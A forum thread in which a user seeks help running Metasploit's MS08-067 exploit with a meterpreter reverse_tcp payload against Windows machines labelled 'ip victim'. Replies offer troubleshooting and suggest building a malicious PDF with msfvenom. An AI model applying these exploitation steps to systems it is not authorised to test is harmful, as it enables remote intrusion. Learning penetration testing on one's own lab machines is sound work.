
Thread: I do not understand where the mistake


  1. #1
    Member
    Join Date
    Mar 2011
    Posts
    50

    Default Msfconsole i do not understand where the mistake

    I have an internet point and I have 4 computers, 1 with XP and 3 with Win7, so then I copy the IP address and I get home, where I installed BackTrack 5. Then I open msfconsole and write "use windows/smb/ms08_067_netapi", "set PAYLOAD windows/meterpreter/reverse_tcp", "set lhost my ip", "set rhost ip victim", "show targets" and choose "sp 3 ita", then "exploit".
    [*] Started reverse handler on 192.168.1.5:4444
    [-] Exploit exception: The connection timed out (ip victim:445).
    [*] Exploit completed, but no session was created.

    I did many tests also on another PC I have here in the LAN with win7 but if I remember correctly I always get
    [*] Exploit completed, but no session was created.
    It would be very pleasant to have your help. Excuse my English.
    Last edited by Darkcomet; 12-19-2011 at 08:47 PM.

  2. #2
    Member
    Join Date
    May 2011
    Location
    Portugal
    Posts
    84

    Default Re: I do not understand where the mistake

    In what OS are you trying to use that exploit?

    Win7 or the XP? Windows 7 is not vulnerable to that exploit, and Windows XP is not vulnerable to that exploit either when patched with update fix "KB9586644".

  3. #3
    Just burned his ISO
    Join Date
    Oct 2011
    Location
    San Diego, CA
    Posts
    21

    Default Re: Msfconsole i do not understand where the mistake

    Quote: Originally Posted by Darkcomet
    I have an internet point and I have 4 computers, 1 with XP and 3 with Win7, so then I copy the IP address and I get home, where I installed BackTrack 5. Then I open msfconsole and write "use windows/smb/ms08_067_netapi", "set PAYLOAD windows/meterpreter/reverse_tcp", "set lhost my ip", "set rhost ip victim", "show targets" and choose "sp 3 ita", then "exploit".
    [*] Started reverse handler on 192.168.1.5:4444
    [-] Exploit exception: The connection timed out (ip victim:445).
    [*] Exploit completed, but no session was created.

    I did many tests also on another PC I have here in the LAN with win7 but if I remember correctly I always get
    [*] Exploit completed, but no session was created.
    It would be very pleasant to have your help. Excuse my English.

    Try using bind_tcp and see if you're able to trigger the payload. Are you sure that port 445 is open? Try running
    Code:
    nmap -A -sS 192.168.1.5
    If the ports are open it could be the firewall preventing you from establishing a reverse connection.

  4. #4
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: I do not understand where the mistake

    Although not all modules support it, you might try the check command in msfconsole. This will see if your target is vulnerable to that particular exploit.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  5. #5
    Just burned their ISO MI1c00k's Avatar
    Join Date
    Jul 2011
    Location
    Slovakia
    Posts
    9

    Default Re: Msfconsole i do not understand where the mistake

    You should check if that system is patched or not, disable the firewall on Win XP and check if your target's service pack + language pack matches the Metasploit module. Use the "show targets" command to check. If it's not there then create one; MS08_067 is a wonderful example of why automatic exploitation tools fail against various service packs and various language packs. Read the detailed HDM description:

    cat /opt/framework/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb

    and try to build your own target as described in the exploit body or here: http://www.hack4fun.eu/2010/05/metas...pi-win-xp-svk/

  6. #6
    Member
    Join Date
    Mar 2011
    Posts
    50

    Default Re: I do not understand where the mistake

    XP, and the command check was not found... I do not know which exploit to use for XP or Win7. I would like to experiment and learn something... Can someone help me?

  7. #7
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: I do not understand where the mistake

    Are you fairly new to metasploit, or have you been working with it awhile? If you're a metasploit newbie, you may want to go through the metasploit unleashed tutorial over at Offensive Security--it's a great resource.

    If you've been using MSF for awhile, try the following: install an old version of Adobe Reader on your XP target. Then, using msfvenom, build a poison pdf with an exploit targeting the vulnerable version of Adobe Reader. Run the poison pdf on your target, and see if you get a shell, meterpreter session, or whatever payload you encoded in the pdf.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  8. #8
    Member
    Join Date
    Mar 2011
    Posts
    50

    Default Re: I do not understand where the mistake

    The central computer does not have Win XP but has Win7. Maybe that is the reason? To switch to the computer with XP, must I first go through the central computer that has Win7? Tell me if that can be the reason.
    Last edited by Darkcomet; 12-24-2011 at 06:26 PM.

  9. #9
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: I do not understand where the mistake

    Not sure what you're saying, but it sounds like you're referring to pivoting (i.e. gaining control of an xp machine first, then going from that to win7). Do you have 2 targets you're trying to exploit (one PC that has xp, and one PC that has Win7)? If so, you may need to try a different exploit...based on what's installed on your target boxes. Metasploit has several exploits available for older versions of Adobe Reader; give one of those a try. You can use a process similar to what I described above.
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

  10. #10
    Member
    Join Date
    Mar 2011
    Posts
    50

    Default Re: I do not understand where the mistake

    Thank you for the answer. Let me ask you only this: I have 4 PCs, 1 with XP and 3 with Win7. I think that I cannot get in with an XP exploit, because the main computer has Win7. Maybe that is the reason?
